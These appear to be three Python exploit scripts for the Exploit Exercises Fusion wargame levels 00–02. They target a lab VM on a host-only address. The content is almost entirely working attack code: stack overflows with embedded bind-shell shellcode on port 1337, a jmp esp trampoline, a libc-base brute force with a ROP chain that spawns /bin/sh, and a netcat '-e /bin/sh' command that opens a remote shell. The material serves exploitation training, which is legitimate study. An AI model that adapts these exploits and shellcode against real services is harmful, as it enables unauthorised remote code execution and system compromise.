exploit-exercises fusion level00 level01 level02

level00

# Exploit for https://exploit-exercises.com/fusion/level00/
# a0rtega

from struct import pack
import socket

# Shell Bind TCP Shellcode Port 1337 - 89 bytes
shellcode = "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"

overflow = "A"*139
#retuaddr = "BBBB"
retuaddr = pack("<L", 0xbffff8f8 + 157) # This address is leaked to us

request = "GET /" + overflow + retuaddr + " HTTP/1.1" + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.105", 20000))
s.sendall(request)
data = s.recv(1024)
data2 = s.recv(1024)
s.close()

print data
print data2

level01

# Exploit for https://exploit-exercises.com/fusion/level01/
# a0rtega

from struct import pack
import socket

# Shell Bind TCP Shellcode Port 1337 - 89 bytes
shellcode =  "\x90" * 128
shellcode += "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"

overflow = "A"*15
overflow += pack("<L", 0x08049f4f); # jmp esp <- after add esp, 0x1c and pops, ret is this
overflow += "A"*118
overflow += "\xeb\x10" # jmp 0x12 <- this is to jump HTTP/1.1 after \x41 'nopsled'

retuaddr =  pack("<L", 0x08049a29) # add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret

request = "GET /" + overflow + retuaddr + " HTTP/1.1" + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.105", 20001))
s.sendall(request)
data = s.recv(1024)
data2 = s.recv(1024)
s.close()

print data
print data2

level02

# Exploit for https://exploit-exercises.com/fusion/level02/
# a0rtega

from struct import pack
import socket
import time
from itertools import cycle, izip

def xor_strings(s, k):
    return "".join(chr(ord(c)^ord(k)) for c,k in izip(s, cycle(k)))

# libc ASLR ranges may not be very accurate

libc_base = 0xb7500000
while (libc_base < 0xb7900000):

    print "Trying libc: 0x%x" % libc_base

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.56.105", 20002))

    # Header
    data = s.recv(4096)

    # nread(0, &op, sizeof(op));
    s.send("E")

    # nread(0, &sz, sizeof(sz));
    s.send(pack("<I", 128))

    # nread(0, buffer, sz);
    s.send("A" * 128)
    time.sleep(0.1)

    # Header 2
    data = s.recv(120)

    # nwrite(1, &sz, sizeof(sz));
    data = s.recv(5)

    # nwrite(1, buffer, sz);
    data = s.recv(128)

    encryption_key = xor_strings(data[0:128], "A")

    # nread(0, &op, sizeof(op));
    s.send("E")

    # ROPGadget to the rescue! :)
    p = ''
    p += pack('<I', libc_base+0x00001a9e) # pop edx ; ret
    p += pack('<I', libc_base+0x00178020) # @ .data
    p += pack('<I', libc_base+0x000238df) # pop eax ; ret
    p += '/bin'
    p += pack('<I', libc_base+0x0008c49c) # mov dword ptr [edx], eax ; ret
    p += pack('<I', libc_base+0x00001a9e) # pop edx ; ret
    p += pack('<I', libc_base+0x00178024) # @ .data + 4
    p += pack('<I', libc_base+0x000238df) # pop eax ; ret
    p += '//sh'
    p += pack('<I', libc_base+0x0008c49c) # mov dword ptr [edx], eax ; ret
    p += pack('<I', libc_base+0x00001a9e) # pop edx ; ret
    p += pack('<I', libc_base+0x00178028) # @ .data + 8
    p += pack('<I', libc_base+0x0002eb8f) # xor eax, eax ; ret
    p += pack('<I', libc_base+0x0008c49c) # mov dword ptr [edx], eax ; ret
    p += pack('<I', libc_base+0x00018f4e) # pop ebx ; ret
    p += pack('<I', libc_base+0x00178020) # @ .data
    p += pack('<I', libc_base+0x0002da2b) # pop ecx ; pop edx ; ret
    p += pack('<I', libc_base+0x00178028) # @ .data + 8
    p += pack('<I', libc_base+0x41414141) # padding
    p += pack('<I', libc_base+0x00001a9e) # pop edx ; ret
    p += pack('<I', libc_base+0x00178028) # @ .data + 8
    p += pack('<I', libc_base+0x0002eb8f) # xor eax, eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x0002dd35) # int 0x80

    # nread(0, &sz, sizeof(sz));
    s.send(pack("<I", (4096 * 32) + 16 + len(p)))

    # nread(0, buffer, sz);
    #s.send(xor_strings("A" * ((4096 * 32) + 16) + "BBBB", encryption_key))
    s.send(xor_strings("A" * ((4096 * 32) + 16) + p, encryption_key))
    time.sleep(0.1)

    data = s.recv(5)
    data = s.recv((4096 * 32) + 16 + len(p))

    s.send("Q")

    s.send("/bin/nc.traditional -lp1337 -e/bin/sh\n")

    s.close()

    libc_base += 0x1000